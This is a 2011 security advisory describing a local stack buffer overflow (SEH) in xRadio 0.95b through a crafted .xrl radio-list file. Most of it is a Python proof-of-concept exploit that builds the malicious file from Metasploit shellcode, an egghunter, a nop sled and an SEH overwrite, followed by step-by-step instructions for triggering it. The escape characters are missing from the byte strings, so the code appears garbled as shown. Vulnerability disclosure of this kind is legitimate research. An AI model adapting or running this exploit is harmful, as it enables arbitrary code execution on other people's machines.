xRadio 0.95b Local Buffer Overflow
Posted on 10 February 2011
GotGeek Labs http://www.gotgeek.com.br/ xRadio 0.95b (.xrl) Local Buffer Overflow (SEH) [+] Description With xRadio you can listen internet radio with Windows Media Player Technology (tm). You can setup a radio list and import asx's files. The program stay on the tray bar. [+] Information Title: xRadio 0.95b (.xrl) Local Buffer Overflow (SEH) Advisory: gg-001-2011 Date: 02-08-2011 Last update: 02-08-2011 Link: http://www.gotgeek.com.br/pocs/gg-001-2011.txt Tested on: Windows XP SP3 (VirtualBox) [+] Vulnerability xRadio is affected by stack-based buffer overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. Successful exploitation of the vulnerability allows an attacker to execute arbitrary code. Other versions are also affected but have a different trigger. Affected Versions: xRadio 0.95b xRadio 0.9 xRadio 0.5 [+] Proof of Concept/Codes #!/usr/bin/python # # # windows/messagebox - 590 bytes # x86/alpha_upper # http://www.metasploit.com # shellcode = ("x89xe1xd9xd0xd9x71xf4x59x49x49x49x49x49x43x43" "x43x43x43x43x51x5ax56x54x58x33x30x56x58x34x41" "x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42" "x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50" "x38x41x43x4ax4ax49x58x59x5ax4bx4dx4bx58x59x54" "x34x47x54x4cx34x50x31x58x52x4ex52x43x47x50x31" "x58x49x52x44x4cx4bx52x51x56x50x4cx4bx54x36x54" "x4cx4cx4bx54x36x45x4cx4cx4bx51x56x43x38x4cx4b" "x43x4ex47x50x4cx4bx56x56x50x38x50x4fx45x48x52" "x55x5ax53x51x49x45x51x58x51x4bx4fx4bx51x43x50" "x4cx4bx52x4cx51x34x47x54x4cx4bx50x45x47x4cx4c" "x4bx50x54x56x48x43x48x45x51x4bx5ax4cx4bx51x5a" "x45x48x4cx4bx50x5ax51x30x45x51x5ax4bx4dx33x50" "x34x51x59x4cx4bx56x54x4cx4bx45x51x5ax4ex56x51" "x4bx4fx50x31x49x50x4bx4cx4ex4cx4dx54x4fx30x43" "x44x45x57x4fx31x58x4fx54x4dx43x31x49x57x5ax4b" "x4cx34x47x4bx43x4cx56x44x51x38x54x35x4bx51x4c" "x4bx50x5ax56x44x45x51x5ax4bx52x46x4cx4bx54x4c" "x50x4bx4cx4bx51x4ax45x4cx45x51x5ax4bx4cx4bx43" "x34x4cx4bx45x51x4bx58x4dx59x51x54x56x44x45x4c" "x45x31x58x43x4fx42x45x58x51x39x49x44x4bx39x4d" "x35x4bx39x49x52x43x58x4cx4ex50x4ex54x4ex5ax4c" "x51x42x4dx38x4dx4fx4bx4fx4bx4fx4bx4fx4cx49x51" "x55x54x44x4fx4bx43x4ex4ex38x4dx32x43x43x4bx37" "x45x4cx56x44x56x32x5ax48x4cx4ex4bx4fx4bx4fx4b" "x4fx4bx39x51x55x45x58x43x58x52x4cx52x4cx51x30" "x47x31x43x58x56x53x47x42x56x4ex45x34x43x58x52" "x55x54x33x45x35x52x52x4bx38x51x4cx56x44x54x4a" "x4dx59x4dx36x50x56x4bx4fx51x45x54x44x4cx49x58" "x42x56x30x4fx4bx4ex48x4ex42x50x4dx4fx4cx4cx47" "x45x4cx51x34x50x52x5ax48x43x51x4bx4fx4bx4fx4b" "x4fx45x38x43x52x52x52x51x48x47x50x45x38x52x43" "x52x4fx52x4dx56x4ex52x48x43x55x43x55x52x4bx56" "x4ex52x48x45x37x52x4fx43x44x52x47x50x31x49x4b" "x4cx48x51x4cx56x44x54x4ex4cx49x5ax43x52x48x52" "x4cx43x58x50x30x56x38x43x58x45x32x56x50x52x54" "x43x55x50x31x49x59x4bx38x50x4cx47x54x45x57x4c" "x49x4bx51x56x51x58x52x43x5ax47x30x50x53x50x51" "x51x42x4bx4fx58x50x56x51x49x50x56x30x4bx4fx50" "x55x43x38x41x41") junk = "x41" * 3248 tag = "x77x30x30x74x77x30x30x74" # w00tw00t nops = "x90" * 230 # Of course we don't need this.. It was just for fun... # egghunter = ("x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8" "x77x30x30x74x8BxFAxAFx75xEAxAFx75xE7xFFxE7") # 32 bytes nseh = "xebx88x90x90" # jump back 118 bytes seh = "x82xe2x47x00" # pop eax - pop ebx - ret at 0x0047E282 [xradio.exe] junk2 = "x42" * 884 try: file = open('b0t.xrl','w'); file.write(junk+tag+shellcode+nops+egghunter+nseh+seh+junk2); file.close(); print " [*] gotgeek labs" print "[*] http://gotgeek.com.br " print "[+] b0t.xrl created." print "[+] Open xRadio.exe..." print "[+] and Radios >> Edit List >> Save radio list" print "[+] Select the *.xrl file, press Yes and boom!! " except: print " [-] Error.. Can't write file to system. " [+] References http://www.puntoequis.com.ar/aktive/default.aspx?SC=SOFT&ID=xRadio [+] Credits b0telh0
